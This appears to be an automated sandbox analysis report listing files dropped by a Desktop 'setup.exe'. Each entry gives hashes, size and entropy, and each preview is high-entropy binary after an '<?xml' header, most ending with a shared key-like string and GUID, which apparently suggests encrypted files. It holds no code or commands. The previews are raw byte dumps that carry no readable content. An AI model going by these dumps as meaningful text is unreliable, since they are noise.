              Preview:<?xml.q..bg*...2H.\) .z.2X.oi7Y..xe`$.54.1..q.J.+.|ID.[ts....cF..4!qQ#.d....d.&..qI.S=i.S.r....~!>3.F......S...}V.........C..4=*J.8.)..f...0e*^v....:.....<y.!......*.#5.Je.d..f........;.+....|....'./..T.L....... .re......o.._I..o....j..E..[...Jcu..(..Ntq..Ptp...!...=..)!%+'s6....<...h..+j."......l.&.s..FX.......c'.0.b.q3...aeX=..M..(..,/.=.c...g..:...5...`...}..l'.^c..g..'QH.o.M45V)*f.4MT<.../q...:.p.<,.Y.. |.c8[..8&?.......a.!...J.... ..s..{.rS...on2.iH.TN....f.L...;.qZ....Da...9|d...]..A.......d..].H..)...*e..H....&'!..!u..v:...c4.~Ho....e....*.A.... .n.._..?....;...=......)...Q.... .%&....F`.P........s...!I..._TC.Z...33j.*[N7.....>@.v..mI6..?.4.E@'.[.....k.b...9...K.G...IN.S.t8..<.....N..c./.j..Ux...a..(.-...>..`S......P.'^..FR.....Z-T..'}:H|......=NW_VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1003
              Entropy (8bit):7.794599942153265
              Encrypted:false
              SSDEEP:24:ZI0B/uayPx53OG/A/mPNXl8TeNb3AQt2Nz5i61nbD:ZIQxyP73OU4mlXVNUQtX6dD
              MD5:0F870DB9A4A993875D33FD581D35EFB3
              SHA1:7AE7B329BF9B3149F9161559F788508634792EE0
              SHA-256:FAFFB63DC891BA9C23D50D1B47750A03A1CECA105D12FC5ECFFD9162224BEED2
              SHA-512:CD5D0697A2A20D70FC1C5D3FD39D76520267C920973728B6EDDFC5F80EDFFF8FABC9EFFE34FC3A0B24A4A258965BA678C006763AB3F1F419FB524C4928D91900
              Malicious:false
              Preview:<?xml.."w.....uI.0(D....?..CZ.2!.P.B.?.T...,{.o]...f.......b*..aH2...u....w.....M...j{c.L..t..`..!._K>a.C..i.?..R....Z.g.+J.P..2...<....Q./W._..p....Q......(...:"8.z..).9.N...v..8.....ID.$...ns. Y....W.}.....:.y.KQo.K.)..i}.E;n.'s.]{5..-.]a..M...O[,:o..9..?$Z3....[.QU.>/.v....rx..H5..-..{c<..&Xb.[.....V..SL........4.Lm)(......Fz.3........]2..U.w.....~.W..W4.)....z.x.e3~s=.>;......h..t......T..r?|....{.....4....oZ|.U.*..j....,U..%.7!.Dp<03.W......u.V@.'.....$..o.m.....g.Z.U.{.._.s....]...k...9#.P...@..<8.p.<.&..L.n.........U/.......W3...I.R......'|..nV.....:.N.:......I.E...../...Y"u.~...H.-....m#{Z?~[7..et..L"...&~.0..S...Yn.v..W.z..T.Y..4V..y.x.'..2r..w....v..A$n.....F..o...m..f.FR-.J..y...2..q^...Dk.?..>.*1.3.*d..C..|..A.........%.+"..V...........&^.+.b....d.. ..!{t.nW!D..dQ....@..3. %.V....0.=.4.x..=ZdB8..y.Z|3..U:dA.v!.[.92...al.c.....!........;....B.....].|..DRZ ..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4D
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):726
              Entropy (8bit):7.690533512589157
              Encrypted:false
              SSDEEP:12:LG8Xptb6MD+Sw0tI6yLaTbqK6E4FpwDuQC7hRLGPuEpwhU14HxzsMR2cii9a:Lxpt0yVFbVrWODu3GnpK3YbD
              MD5:C0BCDE043F2D1B98785B56BDD426F5D8
              SHA1:D8E9999D099D281DB17D41CDE64D6BEE914AC678
              SHA-256:9F9BD604252032CE70675F12D014B895C5A0A7EDACEF05DA34CFCC94F18E2115
              SHA-512:562BB5E556FCA3B894B27476F577CA0B0F0C60945AF992419BAEB948E3A7B5A8DFAA121D58FC7779F7C1933B8AEA461A6EC8DDE0C9F1E6A003B7CA2D76256FBC
              Malicious:false
              Preview:<?xml.....".E.Sp.zEu..M.#../*8...h.....S;.U...,b=........zp..:.6.e...v.V.....R.......G.RJ.........yL.Lo.cJ.....sX11....jX..)...YIR.m...D..y.#.1..[........j.g.me.pb..........w.k.}.i..Z....T........W..Sp.......c.4.'..v<.c..a...tc..<.!V...n..L.c|-X.g..?yg..K}n....<|&.2...9.......O]..o.J.F...y.#...../.w.E.T.Q./U.0...8>...A...#..D...<..B...%...V.3.L........$.=Lp.t..K...2.D.........5...pb...d.G....R..i..D.Q....(D......u...c...N..\(^.l...etc.3hG.F..`..W.fZ..}... z^..:.f.k..X$.S.7{S.....5...y.0..7.."..i.'8n".N...p..I]W/#.......B.t.Q.y.2q.OkL..S..(.{..&.v.....b.;...6..L4r...."%..}..{..g..V...yU.>d....Ji."Y.'.9F..#...H..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):931
              Entropy (8bit):7.777093067774772
              Encrypted:false
              SSDEEP:12:NeuqJcFrww02cK88s0MOiP7f5Uhb7/Z9th+sgZc6Dze/+v7Z8ISEMaI7pfsMR2cq:NeFJBjiVMOiPbkd9v+v66207OEa0bD
              MD5:E4615FA448523D9AD0A8F383D1F0D301
              SHA1:B3BD03A45A6FD52454F637F8FE3BCDE350083FD1
              SHA-256:74D16AA908BA4C5961D51A4847DE7881C4FC2283324746A08F4068ECB1B93C59
              SHA-512:6AB896C74090190C9B8A5DEF1D51397649EC6025070DF7DABDD86CBB459AC69C7997F5CA4E421239C746CB1DE6A0905696A6FAFC1C6A393CC5123856C140C78A
              Malicious:false
              Preview:<?xml|...M.s..8...9.Nt...ML...Y?|.&.R}%....M...28..O+..=^l..4?f.[.\A.<.N...c.fw.5.4....d.6*...GT..T..9&.`./.*.....L.o..+>.[.. .q]...Rh..a".G4......z$..y....^T.Pl.aM"M9]x..M..f.(g.>....?...$.sCBl.X..:O.....+.....f..|...84.[f...5...........)Xo..v7....k.....A..S..~?.3?.'}P...k...h.X..E.}.J...~.AE.f..3w..l..T..f..<d.'.j@...j.I....W.u..|...R.$K&U...{Q....)...'...O......w...A=......g`..f.......0p......b..B>.:.+ZoK....'.&_.i.;....+5.....q....k...OhAB..p'.`...DtWs ..x[B&..<\y.7....:.}.../.j~*.I.Tb..Bq..7<..vB...w.[.....I!.t.h.2....3...7i.B2..z.p.p.....&....h...9..R9<I...1...M..a.BQ..u.....Z.3+...{............uy..S6.P.."_........2..,..........XT..p....{.......~-.n5.Nv./.F..9...S.....e....].@.u{.G....u..(/....w..(...b"F".[Tx.....Q.n.C>1.}7.#..?.V.}.c_...Su..'......NEm...X.[..P.S.qJ.....P...A..B..:O.n.}.'...1. [...&.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):923
              Entropy (8bit):7.788268617559383
              Encrypted:false
              SSDEEP:12:lEE7G6Tng+RjWjMk5EBUGkeaxz0eLhY7co0rviTydRoCpIm62tZrpDokhgswi7X+:6EjnJpWjwcHTjiTqoCpI12PDpvzH8XbD
              MD5:CF3B4FD72092160C2ABD16FA083769DE
              SHA1:3DE00336A28664D31A5F4AB5F4E67D2D7BD539E0
              SHA-256:49DF60DA20DB6F76ACF707F609D69710E3306428C9D95B7629E707424BEAF77A
              SHA-512:455443D5760D07A27AD72E83011A50227D326DDE8337FD3CBF78686A787B71EAF8AA5E1BBD0E853B08F844831E87B62833C2B07F612D9A3A686CC8168166389D
              Malicious:false
              Preview:<?xml....&.."h..Q6!. ..ZW..r...|.............j.1-.s.Nh..\...+...;.t..Z.U]...0tV}..ALGNWY.j.Swe2./n.6.\............p`...C.. ...o.x..hC.+... o]....WuM..oZ!..0<..}lH.u2E......>.......).Lo&yY.m3...|M.A.T.?.aOM...`.@.:.'.&.l.o..a.g......R._.^.J.d...1...FU.1. ....O.s.0^..IH....'5.(.Y&.=.i..)G..o.@.2~....1M.....D..V2^^,q..(..#._o....#@..J..(.-0.@.n..E..$..Do...2._....2.......!..%.M.-.D..K.[Xgq.9...J..8}U..9..[...i...HE...+...1.. \..s+#..8g.+.@.v7.y.!..R.G.N.6......>....,..F.=.g=+.T#.R..].A..{../D'...?.YjNZ..ed.t.[...........dc..........Z...OW...&2...b...6.._..d..C..GfV.D..q........5{...:.O..'Ro...\.L.~..T.D.+....moI.t}Q.. ....Z2.T....4.K.;...e..Q......k.2%w..Z..mII.e.....6...Cr.3..MX.db...A.Y....y""..m..Jh....R..!.!6.Z..J.\&.d&=-J.......y...0....u..f.sr.......|..Uj.........i..h.}E.R.Qo7i...};...G.5VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1267
              Entropy (8bit):7.840851228847403
              Encrypted:false
              SSDEEP:24:gKh0Mly/8Z9UxkdWxv+5OugGQsm5c89oO0E3x8JAuI7SYbUHWbD:gn/jh+tGa0ob2h7oHED
              MD5:75E7D1C683B7C4471659C3A3099C06F6
              SHA1:5CD6477BCF495C461E695674CD89440B8082464E
              SHA-256:E1DE71325B65A4A68C0706B2967B7E05AED4A62D36118D61D7FF96E126BAEEB9
              SHA-512:BE9862056DC27E3CB001AC7C2C413D4F914EB4BE876D9F0F0BE28EC921A2F713C61704728BAF54E9277B9BEA03DFB0CDDD57DB8F80BCB2355BE8151A2367EE5C
              Malicious:false
              Preview:<?xml..)..:..0Fv.3....R.......-.>8.t<...[$..RM*.m.:....;...m...).(...6....;k.......S..Z...*.A.%...W...*.r...>2..W..S.../f=k..H!.\.tnI..H.q\...?.=..I.. f_\.D[i.Xi..q^.U..<h.<W.E.h9.1.a....p..9...<...!3.3}X6...N...<...w@..4.a..U.t..+l.c...v....i..-.:.-..*.Q.m._.-K.9.............N.....9D..n....S.|g..........r......Z.......`.@v..o....^..H.............<C|1.......0.aW.cOY.....{(...D....>.............%.W.HW..Pe9.MsE...s.. .=.8...y.S".f..w..H..$...+E9.K..;;i-....1....A.. ....,..GZ..(....S..o...l..hk.=i...8."....$.....P..r.U.W..{.B%..".I.i.R!.#....(..B.....f...Y..N.k-......IU?..~w.B.Yh...`.BCn..I....^...u.h...t..3I.>G..~7.@.E.=..1_...'l...z.....+6~.R...y|..@7.BM.,=.U..K.F......=..).>.. .<..]...$}.9...L..S.|D@...X...Y.y.d_.[#.|..M.38.@P(.~..../*.G~.!%.....U..g..r..|P...!6.1.>3....i..?.]...*.H..njk.....-.ek...F...Dv0l....m.~K...c..|.1.0uW....J!D.7....c...p.7.}.v<.B..^#...P..2U.....)W..hZ.BR....6..h..uOs.SrQ....>b.a..?..."... ...........#.ip.}v.?...T.*6.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.685725914749049
              Encrypted:false
              SSDEEP:12:st25qtdnEm1GbtUXyOHhxkdSxXTIunCD5weqo12zeQaXU/5t7VasMR2cii9a:soa8ORkajIunCDCeqo1BW7bD
              MD5:175F7D343B6D169F0A15EDB85C35E6D0
              SHA1:FE79D1E4C9A3E6E2ABB6AC9942C22BE7117EB1D0
              SHA-256:93BFE62CEECF9615E60051354BD34920CCCDDBD9C2A9652CB19605836898C58A
              SHA-512:EFAD6D3AB8956D9E5CAE69AFAF21641A10326D6313B02532206D05E7BF64BCA65080821889322F553F91EF0541D0B2FD0DB1A16B7913A5330CA17916A1F8D815
              Malicious:false
              Preview:<?xml.s...[..0........*.\-U'#{``4..|*..8.u.d7zi?XJ).y...r..z`"....c;..\J<.|..m......N.u(....u.;q.v..].r..`.Q.?.X?..9.Q..[R..@..a.......G.R.j......p.:o..=.....`....g;K.n@.K9.(.D0.7.[k/..Q-.y>e......C.....#.5.H.g6..o....j\m..>../.<.....x.w.w....uI.~N.....yuE..p.t%9..}EV.!a. !f..s..}..-.I.5...L,~6...z..2cUi.4.._s..v..Cvd... ..+KB\+...... ..h......Sz8Jq..".E.....c....~..r&..[.^.N.p..2..F..k/.c.=.Z.^.q..#5......D-KlY.&...pb....[.....:S4....~.O..6F.0F}..\.tVO..|.]....oG.."Y...&...j..RJ..V.....`*.;..X.k.......8Yb..J',.[.........`.wp..?|...-..lfb.0...{8.E.@,..1....n_<...<6..5.C..D.........t^..r(yv..p..T.>...40MVrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):723
              Entropy (8bit):7.692569640023356
              Encrypted:false
              SSDEEP:12:MprEQrfYUG8BWM1kzj+U75J1kH6o9jW0n07t79vfSaP6NK1lnzsMR2cii9a:MprJ79G89g5J1po9jWtxSU1CbD
              MD5:F8FE35E501A57A962C5BE11440E86F48
              SHA1:1391DFAA11FF912F920B88DE9546EE3D8B3A1878
              SHA-256:07C4BA7792CB891DB5803BA8A4EDDE538F696E0CB80EB83B68FB4C78CDC676B6
              SHA-512:EE153A48494F12FD793088640852169C1A849FBD67246C578789B4F69F19F95090ECD9E3414D6BE20A0BE5C607D7BEF0FCF961948E8DC1C397ED0147B1C61649
              Malicious:false
              Preview:<?xml..J.....Pz...F..?.'T...#....c1F......I.'.....;..>..%.56.....+....t.E``M.........w@._...:R..v....'.!I(.k.?!...Zn^j.I..o..L.i....&pv/:Jt$'.l..\...O...0....'.SU....|iR..x3.Xf...1-..iG......6k....-.Cz1z.....,.......W..Z....c.,a.O*.}.I..q..s,..Kp:.....p...Y..&.>..M..}k..{...H..4.6.).H.SDW..,.c.$Z..,.-\.S<.)... ....4.Z...i.5.x......vy..-..=?{-z.'q!..*..M).=.O.....ru..e.6.n.hw.q.p.1..69M_.l.#q..2.7.j?..O.Zb..._.q...A....z>D...f5...T.Jf..........YH;.'.<..q...0.'.DX.V.......D...t%R.".<......b.8......sW.:_..?.>..+aF$.,;.a|......sbi\W...E/b..,F....{".O...@GGt6....%..3t.._~.......T.K.>)i..N..S..a.O.(...,P.o2.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):817
              Entropy (8bit):7.719704381671144
              Encrypted:false
              SSDEEP:24:pAZ/0xr8uJ/+k4ZUO14I+9ht2mSI6ExmkLNWzzMYbD:pA9y9JWfvSI0zR6ExhLYcCD
              MD5:1C5BDAAF3B416B9213E650C8B0C503E8
              SHA1:97E15A02290AEA30C513258894E59044717FC10E
              SHA-256:8B592D7A1B5187F27FAD4A75CE3B770D048524C3515000A8F6284E2175C8FA0C
              SHA-512:D5406837AF1EC76633D2F126323199D9E18F47BD86F909850E1EF3227673D2768709B8838F3F23555C2F39D910C57619587769B62C4A1B8C257964853B23F269
              Malicious:false
              Preview:<?xml..AV"m..z'7.X.....t9b....]C....:.N..... ..,.9.i..p.k.~GZ.|.....1M..f....+m....X..VH=...`.V..,.y....Q......<......d....d.g..R.....7Ql,..<d.h.T=......-..D..&Mw.....Z.n.M..."...K..L...........@...9..n..q^6g[...575..a&.....[>.......g..6..$..e...%...@.+..#.*.o..$.,B\....N0.H...O.J.*.....Vl.".Y...h..#~.B...*d.K..KVql...L.IA.l...-x..Cwzx.Pl....+..t..1....VD.kM3{.H......S6..)............$. e.F~....On.....R.L'@...R....#.%....Iz.(...6NE0.ch...e.S.....i7...~g!R....|.LB...]..d...z....WJ3..@.K...L.......bj........+aM7ob2KV....:E...E.5H 4Z.:......K..SB....K........<......C....%..@..p...Hn...OX.pi..p,...T..S.=..~2...j.../.kJ..A.0[.d!...j........3Bl..9.8#..:1...W.....&.....q..*8.....6B....S......0..f.oqQt"b...".VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.680614799102787
              Encrypted:false
              SSDEEP:12:4UqItrHdGZa4WiuflBeR2314gCNtzhkFw8GWMrC0jJykEV99m4WezsMR2cii9a:4UqI7GZaNlQwF4gCNbgt90jJZEV9E4WL
              MD5:4FF45AEA3D4DE4EE7F4F6E55578698D9
              SHA1:85B9D26382CDB7402D70BCCD7D9F1FDB67EB3D40
              SHA-256:431B0016E2ADE8BC35663201D4D8AF9DCA76BB1E02D906FE8974658067DD6FBA
              SHA-512:819A487F174F761E0ACB10484D25EBD53FBED49B3BA3DF8D05C54463ADF8B9EF8706A5F4BACB7B6234E64D7735B97B57467E7B980C2D64E4A5169A92C56FE3B3
              Malicious:false
              Preview:<?xml<+D.....N.*)....8..>......9.......#.N..... .h+..s......W1...8i..-.*\...q...c...1...<........P...<...=..W...j..H.....3.R..5.BG.G.+-.PM..A....XB~.[.....&.H...x....q...c..%.^..qe...8..Pl.. ...g.vP....V'.pZ..,_;C...?...T.{o..Qm.Q.'...1......xB-.ENAs..?.u..`...Q.B.+.t....@....j.B38.j.c&>LFFl/{G....Ja:cy..!.1...nh..P@...c.c.T_6S.H......k...o....(i.#...`..4.|.U#.#.....c......2....*..u....^.qB#.4/...O............@.xL...P]...X.:.k4.X..p.......S..ykV...v6r....?.V.J....+BG.Z..m.{3.{.SC........f..`;..2.z..hs.s.....1H^..G...........K...I..4.I.....y0.,.......B..=.U.>..!c......)...._;v..%k...:...[C.....VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):881
              Entropy (8bit):7.754776760402609
              Encrypted:false
              SSDEEP:12:xJUWP90/P5drB++k5EKV20ocQE66zh7SFiWg2Sx/mwPgwmw6G5SgyIYhjoEfqUWD:8BbY5EKUp+4Fip9Z6aj25CdpHhbD
              MD5:99729BD116BBF27A1696A5943985BE1E
              SHA1:5C9F8C6F01E2C76A3D4016031735BF244412E1D6
              SHA-256:6488DBF3E0EF5B86E001C17EA64A6D5B88BB02D13DB94B5A33B84576058490BF
              SHA-512:1E31A4F6B5C2EEE9DE8909549B5FD955BFD9FA87B27A3E2CD68236F4F2FB601AF10A3B43CF40B63FBCD180853A41C2692F062EB2FC030B8ECBF3240DA0ECB424
              Malicious:false
              Preview:<?xml317...X...~..>.+ls..|T....g....V.Cpn.*....z[...?$p,..3&..'.....Y.R...+.3...AE..`......>.eD.v....n.kP...s..e3...iK.w...7....y.W9.~1Vc..u...G0......V{...u.^.+.n..i...&hb.g...o..!.S._l.B...M.Hu....$.....={....<..V.........0("z...L..@.\l.a..<g..iB...g...V....W....5R...K..h.\.Rm.+..u...PJ.."h.J..N.^.}...Q......E1...'..W...->..SF...rc^.$..J....'.L....=.8.34......k).&N..M.2..lq.9.J..*M.)pCqx..u ..kZC..M.A....=V..=.])l...PL.x.W.........cK.KW..:.d.S1...Cl...>.b.N.Ko.-K...!....S.:<....*....^..+,m...6.....Y....s..+(wf|vM..J..@...K..>.7lY...-...Mz......A.Ro,.i......3...Sl..c|m.o$8.G..+..?..&...T'...+.....\.:zoW..w.....v.v..n..>.&v....0./...6..C.LF...5.l....~.....IOTz.%...{......[.d..P&.....s.o...5. ...s.......i..."...o~.1......}...hM..]..) s....n./.K.V..d.)b..A.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):737
              Entropy (8bit):7.720746902319375
              Encrypted:false
              SSDEEP:12:oBSLtc+nUI3NZ8W8rICmBGBIEb/JTsfNhn4nvVTORqJIU/Uz4Lx7PGDhUojf+4I2:MCq+nvgHZBIEbBTUh4ntlpUcLx7GdLE2
              MD5:0CCF92FD6CB277B74C9B1E000785F356
              SHA1:B4D035A30B119E2D11C2E4D873CEFFEC7577ED6E
              SHA-256:3EDF22740A2D40521D21D785E6EA300C61BEAA1CFDDF7F0CFED50F3CD2344C76
              SHA-512:C1665886EE06E5E4C963D1EBBAA5CE06149CFD584DD71940D2EDC0B58DE069988F55A359FAA26FDD50C6DF2874CF57C1C7BCCBF427807A111A7B1893CF035643
              Malicious:false
              Preview:<?xml.. .......z..EVg....<...S2.1.Xc>1H...i..'..9:m?2PBJ#.I.C.u.W..-.E1.I./H.. g...b..X....>...".K.-.rF.o..w].dnY3....W...3.|.|Z.}..........S.<<....FK.......=M.+.L.Q$.lq3K.Q.& ......Io.....w..u.Y.Z...?....l.a..).;..o....Rbj$..,..+"^.....k)..s...T.......t.'_..&.@.j1....v.K.V..!P.f8.P_2AB..S.xE*.{...`2...0m.lS......a.....Ods....`.s'.gA..x...v,.].Bil..[..Rm.k.Z*...H..f....\FN.eJB. W.E..k71.C;z....}...e.uI.]....gX...|.):G.<...w..}...N..IRn....X.|n.P..j.\.H.0?~.g.../..[...-M.!.K..*.0.k.l..f.?.Rm....@..p...)e..2..k.G.q...0.@..Y9.s..+.)..Es..jNpZ..Mr....ya.....s...r...TX...L.J."g...:4.O...x..{.[,.....h.I..IC.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1421
              Entropy (8bit):7.857281340259478
              Encrypted:false
              SSDEEP:24:lLSYpebzLEa3wjAmTORHdLNcHl9yFl2PXQpYm2uAI1NBT/W5GafUd3+s5bD:tSKeb3EbjrORKlgFgPXGYmr3jkfS5D
              MD5:E5FC8F5333515B779B7C19F39555FCB6
              SHA1:D5D733E662E781D39FB79E21CCF0C25377524186
              SHA-256:7AB64A4A027B65BC599F24880F2127F23AAD24E372D8C291BD15C97C933B3E8B
              SHA-512:03D0639DF6AC504B1D4D7EF9B128AF1ACE46144D1B8DCB92A413AFEBA68C2836F8DA1DBF1678674A47426E54345B8FB7641705EA3C71D6FD2D3B8FB0C131A5DA
              Malicious:false
              Preview:<?xml.4.{DP8o...R;ie....A.......I.a.?E..D.o.....ZB..u..pL..R..U<.Pd(..s...@Ae.*X...P..fj...ZzM..s..7...#..H3........]...t.y.G.L.....2.......R.....J......n#.p..[-.LZ.z]\..L.'.b..._..k.a..E).;:s$.W..Dp..U;..p.....F..#..t..:..3U."}r'.c...1.X....(.g..c}..kV.Q..4'Ic.C:....N._.....1.*....!.P..$-}.2z.,;..S~...|u^c.k.w5.S....p...N<.y.........}..kg....k@.~{f7V.H5z.......=..w.CR...w.@L<4R...X.....:..[...g...9..r5RV...J..s..j..1z...o...A.,0 .q.[J7.4.m..A......1Z1.s...r....TRDN.K...Y....{ya...L....`+.9.........R....`.U]t..fVW.sPXc.....A.h.o.m.W.5.?8..x.l.n...v....&.j6k...K..e......sj.]!.....[\...B...jp^.U.iv4..........w6.*..dz..'.,.e.6.:..".I.ic.B..0.AD..Q..B.......{...l...c..`.K.#..K.......)..).IWM.._.......k...N.J..v"..H.$...J$....o...Z{...H..)..sa.k...,ko.29E.>.+b.......Q..P?..p.7.h.7.d..../.!.^......oe.#R6.......t4.;......Z.7.QO^...@.(h.....(.......!..+....xu.....Tfu;.*w..-.........Oq^..m.Y..E..E.....J1..J.....(....KT...,.-,.C.>2.r.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1171
              Entropy (8bit):7.83958542202178
              Encrypted:false
              SSDEEP:24:AY2DymA8KgDwW5/WjRK87QP8qL5hEYIrsOZAbyS9J9hxNbD:L2f/iREEqL53IwoA2Sr9hHD
              MD5:9AF95F3FEC722F1699E72E55C49B9F02
              SHA1:EBFADB0BBF1F972724C4F05700351D96A3E11900
              SHA-256:CBB8CF0DE4F5B00A2654DEDFCC535425F4F1EF389568F6C8FDD6A826265A357C
              SHA-512:0DA628BB31CDC183697328F171984B431C9CC597AFEF9FE25E1A8D556F8A5B0D1375039BFC3BA3702247ABED7D4C8C3EAD1622F9F298FEF1F851829B2541EB6B
              Malicious:false
              Preview:<?xml..u[..Q...9..o/d......@.>A....9.*.o...W.*.(..&.......-.......Pb.<........9Y....W.K...^.-.q.v...s..VM>.L..hi3....w./....RP.Y..ru9....Y_.6.7. v..;.[.6.L...?....g...v....{.x.../.9......Q..b..L ......^.....z..).j...mfn..y0.>L|*..V.....+.~.u.\o.Y..\..l'....9....P.[....f..KX-......F.o.k<.bCh..V.....|....3.<. .....NM....O*...x.4L....0...Z(5#.t...e..].dE..o..m.....L.S..g$!0..0.>S;|......H.*,/-y..\j....zC+.}.m........z.7..hkJ.....j}.R.t..........k.K...c.z.....H.,AwDp..f..P.>>.W..=,....D.....*..$I:...~..#....6.l|t^J'........@....m..s &......A{.>.......O.+..8.Q.S....s-R...,..n|B.%....i:....i.. p:.....7.".s.x.+e.].}.?..2 .Z...&...pv..!.....b.j.|....m..3.[EJ.c^v.,M....,....e.0..{.E4.......H.......8q..!L=.a...l....-..m...Es...0..'.[.%e].].....!.Rqh.........6q.%..`+]..Wx8..L.|.R.E..h..k........i...6,..`[(.A\D.]..S=./..=.M....]Y.nq...f....+..|<.uqxtr....T...sE|...'.O.....4.e...|eN.Qx..s..O.......k.....]..2.,<.}p.l..a..L:......N,..4z?
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1176
              Entropy (8bit):7.8217983516548735
              Encrypted:false
              SSDEEP:24:JqNEbszKUX90793wViN8Jd3oia/WHeWkC/rueQv730ak3xpbD:0EIzKj7Fwlo3WHBk+qBJk3HD
              MD5:6A51D63DB9C2BE0A82028CC30FAECAD7
              SHA1:D53CAC8CDBB3CE8507C8040A0863FF2479803672
              SHA-256:E008A60AF092F4ED7684CB4617F296F2A9FDE0CD49426006ECDDD82CD05DFDC7
              SHA-512:4E120E26BCEBA49B56BF35CE096BE75624F3678D3BE5CA8DD18ABFFE2ED342D4E7DE0C4A64F666B6EC93096123AC5248D4CF37BC2998A7D932C66A8C61DD5CA3
              Malicious:false
              Preview:<?xml{....P+.xM.hi.R.].p.MA.vL..nO..97.6....LV....X.`..m..M-...8W..b...7..slp...0.&W.w|..e6.....=.+...*.h.^.L2b..^0.~.e.jR..9{...Q.....OX.bm.*ky.X%...@/..Tn_...HG.-G..C...v...!2A._.r\...<.>.9r<..<%`$4..g.9s..bo...r2..4............Lr...UpN.Ur`..@A..k8/.w..2.U..$...k^.%+..J..P.`GG.....i..'...0...E6..`.Q......y....J.4..l...rl..^...DE..o..1.....Zy.I...=2.%S5..tjHA3.G.?..*M.i.\.u.U~.2\b!M...*&. ......P.T.."....^}...C..:.$..]H.. 8L.&..g..#.f?.S<.. ....~...3.w.&.....iS,a.....}...........a....:.....6.}.....3p...9.9...-..M5.y..F...2.B.rS...X...*w"....Yl..>.?.~Vbj.'-?..+..${..E.Y...VU....E...J.Q#.........j2.....Y...^@..a...eY8`.u.......a(...B....5^.h..../.`).x......"D.\.`....rhI..i.....[Hg.....d..Z.>'.&8.....l/.Nz.....'.&7.Cko.........q..i...'.....y............_..>.b.-..gF&....i..........h.1.*..].r._.#.$....H...@..R.p1.1.z.s.m5..B.......T.C:.u6...Aq....m..~.x..8....C...Z....?..;...`y..Jns.Q.s...........i[..i..gj.R}..\&.9..%....t+..z...`.....l cU
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1155
              Entropy (8bit):7.822640971732916
              Encrypted:false
              SSDEEP:24:QAX4THQONgT/VNaDB0deK6wuvXAsNP2GUeck45rQ3nXTy+AjSbD:QtTw6gTIB0IK6wuvVP2GUetar8yAD
              MD5:ED3A69BF217597B9FC8252972F77E6DE
              SHA1:81E15CCE06C9D5D96CEA92C8DF5D6789645B3FC9
              SHA-256:BEBA61B6D5644633C7C0CA55263339178C9D8635D843C95AA50D842808EA10E9
              SHA-512:C3E616C0D85FD766F0B5CE42D62217D7654943228AE2E8BD9CCD6747E9AB64000A18AE94C60D438CD9B766186C6B014A9C608F1CC5F0B30E46B612E9603A9163
              Malicious:false
              Preview:<?xmlm..6.Uo...Fp......hz..+.5+..N._D....=@.'.v.....|...o..fI.%.`...(*.-N].O..9....eG.=.L....$.1d..h-J.~.PCB.n.. .p.9....L.....Q9...oUUS.~.tJ....o,.$..^c.k....h.Pey..4.....t.lEO..x...o......z......g....!.9...E0.qy..%.N..kc..K+-..9.i4{uNqY"\f...+...&H....M.sA.[.MtS).........n.....u...X.#B...e$.\I.#.>..K.w.h..O..W...nl.......IS.(..@..=...g..p.U.z........,...V.M..q..i.....y..<..O9...k..>n.;.w#..A.9$$..y..ux.U........s:.wG.......p.....n.....TR1.E.D.cM.S)+.C..ge..~!.Z......{+(.0....t.0=.a.S.4.t.oE.Y.....npV.k`A..8ehY.Ht._s.T...A..b._.+..|.....2...}.*.+b.+3,..K...P.Do.OZ.......!n...C!...)..M#....n.o...E.1..h.c~....OB.A..q...;d.LJ.3...L.......+.....2..B....R!.f.k[.A.CT....J.a*#......h.%=54.(zq...B[...l...o....=sP.G....krC.2x...RHRl..`.k.a".=u.H...W.R/......B.d...s.{Su....].0.W...0..K'..8...i*.%......v...s%..k..U.?-.P7[.2.......}...C..U&...."...e......d..Sm.\o....m.!=I.{.